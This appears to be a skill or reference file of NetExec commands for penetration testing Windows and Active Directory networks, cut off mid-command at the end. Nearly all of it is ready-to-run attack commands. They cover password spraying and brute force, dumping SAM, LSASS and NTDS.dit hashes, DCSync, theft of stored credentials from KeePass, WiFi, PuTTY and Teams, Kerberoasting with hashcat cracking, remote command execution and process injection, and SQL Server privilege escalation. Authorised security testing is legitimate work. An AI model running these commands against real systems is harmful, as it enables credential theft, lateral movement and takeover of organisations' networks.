### NetExec Local Authentication (SMB) Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Example of authenticating to SMB targets using local user credentials. ```bash nxc smb 192.168.1.0/24 -u localadmin -p 'Password123' --local-auth ``` -------------------------------- ### NetExec Target Formats Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Examples of different ways to specify target hosts or networks for NetExec commands. ```bash nxc smb 192.168.1.0/24 # CIDR ``` ```bash nxc smb 192.168.1.1 192.168.1.2 # Multiple IPs ``` ```bash nxc smb 192.168.1.1-28 # IP range ``` ```bash nxc smb dc01.corp.local # Hostname ``` ```bash nxc smb ~/targets.txt # File ``` -------------------------------- ### NetExec Domain Authentication (SMB) Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Examples of authenticating to SMB targets using domain credentials provided as plaintext password or NTLM hash. ```bash nxc smb 192.168.1.0/24 -u Administrator -p 'Password123' ``` ```bash nxc smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:NTHASH' ``` -------------------------------- ### NetExec Multi-Domain Authentication Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Example of authenticating across multiple domains using a file with domain-qualified usernames. ```bash # users.txt format: # DOMAIN1\user1 # DOMAIN2\user2 nxc smb -u users.txt -p 'Password123' ``` -------------------------------- ### Get File via SMB Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Downloads a file from a remote host to the local system. ```bash nxc smb -u user -p pass --get-file /remote/path/file.txt /local/path/file.txt ``` -------------------------------- ### Enumerate Antivirus/EDR Software Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Attempts to enumerate installed Antivirus or Endpoint Detection and Response software on the target host. Does not require admin privileges. ```bash nxc smb -u user -p pass -M enum_av ``` -------------------------------- ### NetExec Password Spraying Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Examples of spraying a single password across multiple users or using jitter to throttle requests and avoid lockouts. ```bash # Spray one password across many users nxc smb -u ~/users.txt -p 'Summer2024!' --no-bruteforce --continue-on-success ``` ```bash # Throttle to avoid lockouts nxc smb -u ~/users.txt -p 'Pass123' --jitter 3 ``` ```bash nxc smb -u ~/users.txt -p 'Pass123' --jitter 2-5 ``` -------------------------------- ### List Modules for Protocol Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Lists all available modules for a given protocol (e.g., SMB, LDAP, WinRM). ```bash nxc smb -L ``` ```bash nxc ldap -L ``` ```bash nxc winrm -L ``` -------------------------------- ### Pentest Scenario: Initial Recon (No Creds) Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Performs initial reconnaissance to discover live hosts, SMB info, and potential relay targets without requiring credentials. ```bash # 1. Discover live hosts and SMB info nxc smb 192.168.1.0/24 # 2. Find hosts without SMB signing (relay targets) nxc smb 192.168.1.0/24 --gen-relay-list relay.txt # 3. Check null session / guest logon nxc smb 192.168.1.0/24 -u '' -p '' nxc smb 192.168.1.0/24 -u 'a' -p '' # 4. Enumerate shares with null session nxc smb 192.168.1.0/24 -u '' -p '' --shares # 5. ASREPRoast with username wordlist nxc ldap -u users.txt -p '' --asreproast asrep.txt hashcat -m18200 asrep.txt /usr/share/wordlists/rockyou.txt ``` -------------------------------- ### Run Module Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Executes a specific module on a target. Requires protocol, IP, credentials, and module name. ```bash nxc smb -u user -p pass -M lsassy ``` -------------------------------- ### View Module Options Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Displays the available options for a specific module within a protocol. ```bash nxc smb -M lsassy --options ``` -------------------------------- ### Pentest Scenario: With Domain Admin Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Leverages domain administrator credentials to dump NTDS.dit, perform DCSync, and dump DPAPI secrets at scale. ```bash # 1. Dump NTDS.dit nxc smb -u DomainAdmin -p 'Pass' --ntds # 2. DCSync specific user nxc smb -u DomainAdmin -p 'Pass' -M mimikatz -o COMMAND='"lsadump::dcsync /domain:corp.local /user:krbtgt"' # 3. Dump all DPAPI secrets at scale nxc smb 192.168.1.0/24 -u DomainAdmin -p 'Pass' --dpapi nosystem ``` -------------------------------- ### Force SMB Execution Method Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Specifies the execution method (wmiexec, atexec, smbexec) for commands. The tool attempts a fallback order if not specified. ```bash nxc smb -u user -p pass -x whoami --exec-method wmiexec ``` ```bash nxc smb -u user -p pass -x whoami --exec-method atexec ``` ```bash nxc smb -u user -p pass -x whoami --exec-method smbexec ``` -------------------------------- ### Enumerate Active Sessions via QWINSTA Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Lists active sessions using the QWINSTA command. Requires administrative privileges. ```bash nxc smb 192.168.1.0/24 -u user -p pass --qwinsta ``` ```bash nxc smb 192.168.1.0/24 -u user -p pass --qwinsta targetuser ``` -------------------------------- ### NetExec Kerberos Authentication Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Demonstrates Kerberos authentication using password, existing ccache ticket, or specifying a KDC host. ```bash # Auto-handle TGT using password nxc smb dc01.corp.local -u user -p pass -k ``` ```bash # Use existing ccache ticket export KRB5CCNAME=/path/to/ticket.ccache nxc smb dc01.corp.local --use-kcache ``` ```bash # Specify KDC explicitly nxc ldap dc01.corp.local -u user -p pass -k --kdcHost dc01.corp.local ``` -------------------------------- ### Pentest Scenario: With Local Admin (Lateral Movement) Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Performs lateral movement using local administrator credentials to dump credentials, spray hashes, and spider shares. ```bash # 1. Dump SAM / LSA on target nxc smb -u localadmin -p pass --local-auth --sam nxc smb -u localadmin -p pass --local-auth --lsa # 2. Dump LSASS (get domain creds) nxc smb -u localadmin -p pass --local-auth -M lsassy # 3. Spray dumped hashes across subnet nxc smb 192.168.1.0/24 -u Administrator -H --local-auth # 4. Spider shares for sensitive files nxc smb 192.168.1.0/24 -u user -p pass -M spider_plus ``` -------------------------------- ### Pentest Scenario: With Domain Creds (Low Privilege) Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Collects domain information using low-privilege domain credentials, including BloodHound data, password policy, user enumeration, and Kerberoasting. ```bash # 1. Collect BloodHound data nxc ldap -u user -p pass --bloodhound --collection All # 2. Get password policy nxc smb -u user -p pass --pass-pol # 3. Enumerate all users nxc ldap -u user -p pass --users-export users.txt # 4. Kerberoast nxc ldap -u user -p pass --kerberoasting kerberoast.txt hashcat -m13100 kerberoast.txt /usr/share/wordlists/rockyou.txt # 5. Find delegation misconfigs nxc ldap -u user -p pass --find-delegation # 6. Check DACL rights on Domain Admins nxc ldap -k -M daclread -o TARGET="Domain Admins" ACTION=read # 7. Scan for vulns nxc smb 192.168.1.0/24 -u user -p pass -M zerologon -M nopac -M coerce_plus ``` -------------------------------- ### Map Live Hosts and Gather SMB Information Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Discovers live hosts on a subnet and retrieves OS, hostname, domain, signing status, and SMBv1 information. ```bash nxc smb 192.168.1.0/24 ``` -------------------------------- ### Enumerate SMB Shares Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Lists available SMB shares on a target host. Requires valid credentials or can attempt null session enumeration. ```bash nxc smb -u user -p pass --shares ``` ```bash nxc smb -u '' -p '' --shares ``` -------------------------------- ### Run Multiple Modules Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Executes multiple modules sequentially on a target. Available in v1.1+. ```bash nxc smb -u user -p pass -M spooler -M iis -M lsassy -M winscp ``` -------------------------------- ### Spider and Download All Files Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Recursively spiders all readable shares and downloads all found files to the local system. ```bash nxc smb -u user -p pass -M spider_plus -o DOWNLOAD_FLAG=True ``` -------------------------------- ### Put File via SMB Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Uploads a file from the local system to a remote host. ```bash nxc smb -u user -p pass --put-file /local/file.txt /remote/path/file.txt ``` -------------------------------- ### Run SQL Query Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Executes a SQL query against the target SQL Server. ```bash # Run SQL query nxc mssql -u admin -p pass --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;' ``` -------------------------------- ### Enumerate Disks Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Lists available disk drives on target hosts. Requires valid credentials. ```bash nxc smb 192.168.1.0/24 -u user -p pass --disks ``` -------------------------------- ### Execute CMD Command via SMB Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Executes a command on the remote host using the SMB protocol. Requires administrative privileges. ```bash nxc smb -u Administrator -p 'Pass' -x whoami ``` -------------------------------- ### Log All Results to File Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Logs all command results to a specified text file. Useful for record-keeping. ```bash nxc smb -u user -p pass --log results.txt ``` -------------------------------- ### Enumerate Remote Processes Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Lists running processes on the target host. Requires administrative privileges. ```bash nxc smb -u user -p pass --remote-processes ``` -------------------------------- ### Enumerate Network Interfaces Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Retrieves network interface information from target hosts. Requires administrative privileges. ```bash nxc smb -u user -p pass --interfaces ``` -------------------------------- ### Kerberoasting - AS-REP Roastable Account Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Performs Kerberoasting against an AS-REP roastable account without pre-authentication. ```bash # Kerberoasting via AS-REP roastable account nxc ldap -u asrep_user -p '' --no-preauth-targets kerberoastable.list --kerberoasting out.txt ``` -------------------------------- ### Generate Relay List for SMB Signing Not Required Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Identifies hosts where SMB signing is not required, making them potential candidates for SMB relay attacks. ```bash nxc smb 192.168.1.0/24 --gen-relay-list relay_targets.txt ``` -------------------------------- ### SCCM Enumeration Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Enumerates SCCM information from the target. ```bash # SCCM enumeration nxc ldap -u user -p pass -M enum-sccm ``` -------------------------------- ### Backup DACLs for Multiple Targets Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Backs up DACLs for multiple targets specified in a file. ```bash # Backup DACLs for multiple targets nxc ldap dc.lab.local -k -M daclread -o TARGET=../../targets.txt ACTION=backup ``` -------------------------------- ### Check for Guest Logon Access Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Attempts to enumerate shares using a guest logon, which can reveal accessible resources without valid credentials. ```bash nxc smb -u 'a' -p '' ``` ```bash nxc smb -u 'a' -p '' --shares ``` -------------------------------- ### Process Injection via SMB Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Injects a process into an existing process on the remote host. Requires SYSTEM privileges and a target PID. ```bash nxc smb -u user -p pass -M pi -o PID= EXEC=whoami ``` -------------------------------- ### Crack ASREPRoast Hashes with Hashcat Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Cracks ASREPRoast hashes using Hashcat with a specified wordlist. ```bash # Crack with hashcat hashcat -m18200 output.txt wordlist.txt ``` -------------------------------- ### Enumerate Local Groups Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Lists local groups on target hosts. Requires valid credentials. ```bash nxc smb 192.168.1.0/24 -u user -p pass --local-group ``` -------------------------------- ### VNC Screenshot Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Captures a screenshot from a target VNC host. Requires IP. ```bash nxc vnc --screenshot ``` -------------------------------- ### FTP List Files Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Lists files on a remote FTP server. Requires IP, username, and password. ```bash nxc ftp -u user -p pass --ls ``` -------------------------------- ### NetExec Core Authentication Flags Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Flags for specifying usernames, passwords, and NTLM hashes for authentication. ```bash nxc -u USERNAME ``` ```bash nxc -u user1 user2 ``` ```bash nxc -u ~/users.txt ``` ```bash nxc -p PASSWORD ``` ```bash nxc -p 'P@ss!' ``` ```bash nxc -p='-P@ss' ``` ```bash nxc -H 'NTHASH' ``` ```bash nxc -H 'LM:NT' ``` ```bash nxc -H 'aad3b435b51404eeaad3b435b51404ee:NTHASH' ``` ```bash nxc -id ``` ```bash nxc --local-auth ``` -------------------------------- ### VNC Authentication Check Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Checks authentication against VNC targets. Requires IP, username, and password. ```bash nxc vnc -u user -p pass ``` -------------------------------- ### Enumerate Logged-on Users Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Lists users currently logged into target hosts. Requires administrative privileges. ```bash nxc smb 192.168.1.0/24 -u user -p pass --loggedon-users ``` ```bash nxc smb 192.168.1.0/24 -u user -p pass --loggedon-users targetuser ``` -------------------------------- ### Enumerate Domain Users Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Lists domain users on a target host. Can export the list to a file. ```bash nxc smb -u user -p pass --users ``` ```bash nxc smb -u user -p pass --users-export output.txt ``` -------------------------------- ### Enumerate Active Windows Sessions (Registry-based) Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Retrieves active Windows sessions by querying the registry, which does not require administrative privileges. ```bash nxc smb /24 -u user -p pass --reg-sessions ``` ```bash nxc smb /24 -u user -p pass --reg-sessions 'admin_user' ``` ```bash nxc smb /24 -u user -p pass --reg-sessions './users.txt' ``` -------------------------------- ### Dump SAM Hashes via SMB Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Extracts local account password hashes from the Security Account Manager (SAM) database. Requires local administrator privileges. ```bash nxc smb 192.168.1.0/24 -u Administrator -p 'Pass' --sam ``` ```bash nxc smb 192.168.1.0/24 -u Administrator -p 'Pass' --sam secdump ``` -------------------------------- ### Crack Kerberoasting Hashes with Hashcat Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Cracks Kerberoasting hashes using Hashcat with a specified wordlist. ```bash # Crack with hashcat hashcat -m13100 output.txt wordlist.txt ``` -------------------------------- ### Spider All Readable Shares (List Only) Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Recursively lists all files within all readable shares on the target host. ```bash nxc smb -u user -p pass -M spider_plus ``` -------------------------------- ### MSSQL File Download Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Downloads a file from the remote SQL Server to the local machine. ```bash nxc mssql -u user -p pass --get-file C:\remote\file.txt /local/file.txt ``` -------------------------------- ### Continue After First Valid Credential Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md This command continues the scan after finding the first valid credential, useful for large-scale credential spraying. ```bash nxc smb -u ~/users.txt -p 'Password' --continue-on-success ``` -------------------------------- ### Execute Command via RDP Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Use to execute a command on a remote host via RDP. Requires IP, username, password, and the command. ```bash nxc rdp -u user -p pass -x whoami ``` -------------------------------- ### NetExec Global Syntax Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md The basic structure for all NetExec commands, specifying the protocol, targets, and various option categories. ```bash nxc [auth options] [action options] [global options] ``` -------------------------------- ### MSSQL File Upload Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Uploads a local file to the remote SQL Server. ```bash # Upload/download files nxc mssql -u user -p pass --put-file /local/file.txt C:\remote\file.txt ``` -------------------------------- ### FTP Authentication Check and Spraying Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Checks authentication or performs spraying against FTP targets. Can use single credentials or lists of users and passwords. ```bash nxc ftp -u user -p pass ``` ```bash nxc ftp -u ~/users.txt -p ~/passwords.txt ``` -------------------------------- ### MSSQL OS Command via xp_cmdshell Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Executes OS commands on the target via xp_cmdshell, requiring sysadmin privileges. ```bash # OS command via xp_cmdshell (requires sysadmin) nxc mssql -u sa -p pass -x whoami ``` -------------------------------- ### NFS Enumerate Exports Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Enumerates NFS export shares on a target. Can optionally use credentials. ```bash nxc nfs ``` ```bash nxc nfs -u user -p pass --enum-shares ``` -------------------------------- ### NetExec Brute Force and Hash Spraying Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Commands for performing full brute-force attacks (user x password) and spraying NTLM hashes. ```bash # Brute force (user × pass combinations) nxc smb -u ~/users.txt -p ~/passwords.txt ``` ```bash # Hash spraying nxc smb -u ~/users.txt -H ~/hashes.txt --no-bruteforce ``` -------------------------------- ### Enumerate Unsecured DNS Zones Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Enumerates unsecured DNS zones on the target. ```bash # Unsecured DNS zones nxc ldap -u user -p pass --enumerate-unsecure-dns-zones ``` -------------------------------- ### Dump NTDS.dit via SMB Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Extracts the NTDS.dit file, containing all Active Directory hashes. Requires Domain Admin privileges. ```bash nxc smb 192.168.1.100 -u DomainAdmin -p 'Pass' --ntds ``` ```bash nxc smb 192.168.1.100 -u DomainAdmin -p 'Pass' --ntds --enabled ``` ```bash nxc smb 192.168.1.100 -u DomainAdmin -p 'Pass' --ntds vss ``` ```bash nxc smb 192.168.1.100 -u DomainAdmin -p 'Pass' --ntds --user Administrator ``` ```bash nxc smb 192.168.1.100 -u DomainAdmin -p 'Pass' --ntds --user NETBIOS/Administrator ``` -------------------------------- ### MSSQL Privilege Escalation - Check Impersonation Rights Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Checks for impersonation rights on a target SQL Server for privilege escalation. ```bash # Privilege escalation — check for impersonation rights nxc mssql -u user -p pass -M mssql_priv ``` -------------------------------- ### ASREPRoast - No Authentication Required Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Performs ASREPRoast attacks to find Kerberos tickets. Can be used anonymously if allowed, or with provided credentials. ```bash # ASREPRoast — no auth needed if you have usernames nxc ldap -u '' -p '' --asreproast output.txt # anonymous (if allowed) nxc ldap -u users.txt -p '' --asreproast output.txt nxc ldap -u user -p pass --asreproast output.txt # authenticated (finds all) nxc ldap -u user -p pass --asreproast output.txt --kdcHost dc01.corp.local ``` -------------------------------- ### NetExec Brute Force Flag Clarification Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Important note on the behavior of the --no-bruteforce flag in combination with user and password files. ```bash # IMPORTANT: --no-bruteforce pairs user[0]:pass[0], user[1]:pass[1], etc. # Without it: every user × every password (full bruteforce) ``` -------------------------------- ### Check for Lockscreen Backdoors Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Scans for potential lockscreen backdoors on the target host. Requires administrative privileges. ```bash nxc smb -u Administrator -p 'PASSWORD' -M lockscreendoors ``` -------------------------------- ### Execute PowerShell Command via SMB Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Executes a PowerShell command on the remote host. Requires administrative privileges. ```bash nxc smb -u Administrator -p 'Pass' -X '$PSVersionTable' ``` -------------------------------- ### RDP Screenshot (Authenticated) Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Captures a screenshot from a target RDP host after successful authentication. ```bash nxc rdp -u user -p pass --screenshot ``` -------------------------------- ### WMI Authentication Check Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Checks authentication credentials against a target via WMI. ```bash # Auth check nxc wmi -u user -p pass ``` -------------------------------- ### Dump Teams Cookies Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Dumps Teams cookies from the local machine. ```bash nxc smb -u user -p pass -M teams_localdb ``` -------------------------------- ### Perform Null Session Enumeration Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Attempts to enumerate information via null sessions, which can be used to identify potential vulnerabilities. ```bash nxc smb -u '' -p '' ``` -------------------------------- ### Enumerate BitLocker Status Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Checks the BitLocker encryption status on the target host. Requires valid credentials. ```bash nxc smb -u user -p pass -M bitlocker ``` -------------------------------- ### WinRM Authentication Check Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Checks authentication credentials against a target via WinRM. ```bash # Check auth nxc winrm -u user -p pass ``` -------------------------------- ### Pre2k Computer Account Abuse Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Abuses pre-Windows 2000 computer account vulnerabilities. ```bash # Pre2k Computer Account Abuse nxc ldap -u user -p pass -M pre2k # Tickets saved to ~/.nxc/modules/pre2k/ccache/ ``` -------------------------------- ### MSSQL Linked Servers Enumeration Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Enumerates linked servers configured on the target SQL Server. ```bash # Linked servers nxc mssql -u user -p pass --mssql-linked-servers ``` -------------------------------- ### Check for NTLMv1 Support Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Checks if NTLMv1 is enabled on the target host via remote registry. Requires administrative privileges. ```bash nxc smb -u user -p pass -M ntlmv1 ``` -------------------------------- ### MSSQL Authentication Check (Local SQL Account) Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Checks authentication credentials against a target SQL Server using a local SQL account. ```bash # Auth check (local SQL account) nxc mssql -u sa -p 'P@ssw0rd' --local-auth ``` -------------------------------- ### Execute Command via SSH Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Use to execute a command on a remote host via SSH. Requires IP, username, and password. ```bash nxc ssh -u user -p pass -x whoami ``` -------------------------------- ### BloodHound Data Collection - All Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Collects all data types for BloodHound from the specified IP address. ```bash nxc ldap -u user -p pass --bloodhound --collection All ``` -------------------------------- ### WinRM Execute Command Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Executes a specified command on the target machine via WinRM. ```bash # Execute command nxc winrm -u user -p pass -X whoami ``` -------------------------------- ### Find Misconfigured Delegations Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Finds all misconfigured delegations including Unconstrained, Constrained, and RBCD. ```bash # Find all misconfigured delegations (Unconstrained, Constrained, RBCD) nxc ldap -u user -p pass --find-delegation ``` -------------------------------- ### Interactive WinRM Shell with Evil-WinRM Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Provides an interactive shell using evil-winrm for WinRM connections. ```bash evil-winrm -i -u user -p pass ``` -------------------------------- ### MSSQL Authentication Check (Domain) Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Checks authentication credentials against a target SQL Server using domain credentials. ```bash # Auth check (domain) nxc mssql -u user -p pass ``` -------------------------------- ### Dump NTDS.dit using ntdsutil module Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Extracts the NTDS.dit file using the ntdsutil module. Requires Domain Admin privileges. ```bash nxc smb 192.168.1.100 -u DomainAdmin -p 'Pass' -M ntdsutil ``` -------------------------------- ### MSSQL Privilege Escalation - Escalate to Sysadmin Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Escalates privileges to sysadmin on the target SQL Server. ```bash # Escalate to sysadmin nxc mssql -u user -p pass -M mssql_priv -o ACTION=privesc ``` -------------------------------- ### MSSQL Enumerate Users by RID Brute Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Enumerates users on the target SQL Server by performing a RID brute-force attack. ```bash # Enumerate users by RID brute nxc mssql -u user -p pass --rid-brute ``` -------------------------------- ### NTDS Raw Disk Access Dump Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Dumps the NTDS.dit file using raw disk access via SMB. Requires administrative privileges. ```bash nxc smb 192.168.1.100 -u DomainAdmin -p 'Pass' -M ntds-dump-raw -o TARGET=NTDS ``` -------------------------------- ### Custom LDAP Query Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Executes a custom LDAP query and retrieves specified attributes. ```bash # Custom LDAP query nxc ldap -u user -p pass --query "(objectClass=user)" "sAMAccountName" ``` -------------------------------- ### WMI Execute Command Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Executes a specified command on the target machine via WMI. ```bash # Execute command nxc wmi -u user -p pass -x whoami ``` -------------------------------- ### Notepad/Notepad++ Unsaved Documents Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Retrieves unsaved documents from Notepad and Notepad++. ```bash nxc smb -u user -p pass -M notepad ``` ```bash nxc smb -u user -p pass -M notepad++ ``` -------------------------------- ### NFS Chroot Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Escapes to the root filesystem via NFS. Requires IP, credentials, and the target path. ```bash nxc nfs -u user -p pass --chroot ``` -------------------------------- ### Spider Specific Share for File Pattern Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Recursively searches a specified share for files matching a given pattern. ```bash nxc smb -u user -p pass --spider C$ --pattern txt ``` -------------------------------- ### EternalBlue Vulnerability Scan (MS17-010) Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Scans for the EternalBlue vulnerability. Does not require credentials. ```bash nxc smb -u '' -p '' -M ms17-010 ``` -------------------------------- ### LDAP Group Enumeration Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Enumerates groups and their members from an LDAP server. ```bash nxc ldap -u user -p pass --groups ``` ```bash nxc ldap -u user -p pass --group-members "Domain Admins" ``` -------------------------------- ### BloodHound Data Collection - Session and LoggedOn Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Collects Session and LoggedOn data for BloodHound from the specified IP address. ```bash nxc ldap -u user -p pass --bloodhound --collection Session,LoggedOn ``` -------------------------------- ### Brute-force RIDs for User Enumeration Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Enumerates users by bruteforcing Relative Identifiers (RIDs), useful when domain credentials are not available. ```bash nxc smb -u '' -p '' --rid-brute ``` ```bash nxc smb -u '' -p '' --rid-brute 10000 ``` -------------------------------- ### Multiple Vulnerability Checks Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Runs multiple vulnerability checks simultaneously against a target. ```bash nxc smb -u '' -p '' -M zerologon -M printnightmare -M smbghost ``` -------------------------------- ### SSH Authentication Check Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Checks authentication credentials against a target via SSH. ```bash # Auth check nxc ssh -u user -p pass nxc ssh -u root -p pass # Pwn3d! if root ``` -------------------------------- ### RDP Authentication Check and Password Spraying Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Checks authentication or performs password spraying against RDP targets. Can use single credentials or lists of users and passwords. ```bash nxc rdp -u user -p pass ``` ```bash nxc rdp 192.168.1.0/24 -u ~/users.txt -p ~/passwords.txt ``` -------------------------------- ### Kerberoasting - Standard and Targeted Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Performs Kerberoasting attacks to obtain service tickets. Supports targeted attacks against specific accounts. ```bash # Kerberoasting nxc ldap -u user -p pass --kerberoasting output.txt # Targeted Kerberoasting (requires WriteProperty on servicePrincipalName) nxc ldap -u user -p pass --kerberoasting output.txt --targeted-kerberoast victim1 nxc ldap -u user -p pass --kerberoasting output.txt --targeted-kerberoast users.list ``` -------------------------------- ### Credential Manager Application Discovery Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Discovers and extracts credentials from various credential manager applications. Includes support for KeePass, Veeam, WiFi, WinSCP, VNC, mRemoteNG, RDCMan, and PuTTY. ```bash nxc smb -u user -p pass -M keepass_discover ``` ```bash nxc smb -u user -p pass -M keepass_trigger -o KEEPASS_CONFIG_PATH="/path/from/discovery" ``` ```bash nxc smb -u user -p pass -M veeam ``` ```bash nxc smb -u user -p pass -M wifi ``` ```bash nxc smb -u user -p pass -M winscp ``` ```bash nxc smb -u user -p pass -M vnc ``` ```bash nxc smb -u user -p pass -M mremoteng ``` ```bash nxc smb -u user -p pass -M rdcman ``` ```bash nxc smb -u user -p pass -M putty ``` -------------------------------- ### ZeroLogon Vulnerability Scan (CVE-2020-1472) Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Scans for the ZeroLogon vulnerability. Does not require credentials. ```bash nxc smb -u '' -p '' -M zerologon ``` -------------------------------- ### Unconstrained Delegation Accounts Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Identifies accounts configured with unconstrained delegation. ```bash # Unconstrained delegation accounts nxc ldap -u user -p pass --unconstrained-delegation ``` -------------------------------- ### SMBGhost Vulnerability Scan (CVE-2020-0796) Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Scans for the SMBGhost vulnerability. Does not require credentials. ```bash nxc smb -u '' -p '' -M smbghost ``` -------------------------------- ### WMI Password Spray Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Performs a password spray attack against multiple users and IPs using WMI. ```bash # Password spray nxc wmi -u ~/users.txt -p ~/passwords.txt ``` -------------------------------- ### Coercion Vulnerability Scanning Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Scans for various coercion vulnerabilities including PetitPotam, DFSCoerce, PrinterBug, MSEven, and ShadowCoerce. Requires specifying a listener IP and optionally a method. ```bash nxc smb -u '' -p '' -M coerce_plus ``` ```bash nxc smb -u '' -p '' -M coerce_plus -o LISTENER= ``` ```bash nxc smb -u '' -p '' -M coerce_plus -o LISTENER= ALWAYS=true ``` ```bash nxc smb -u '' -p '' -M 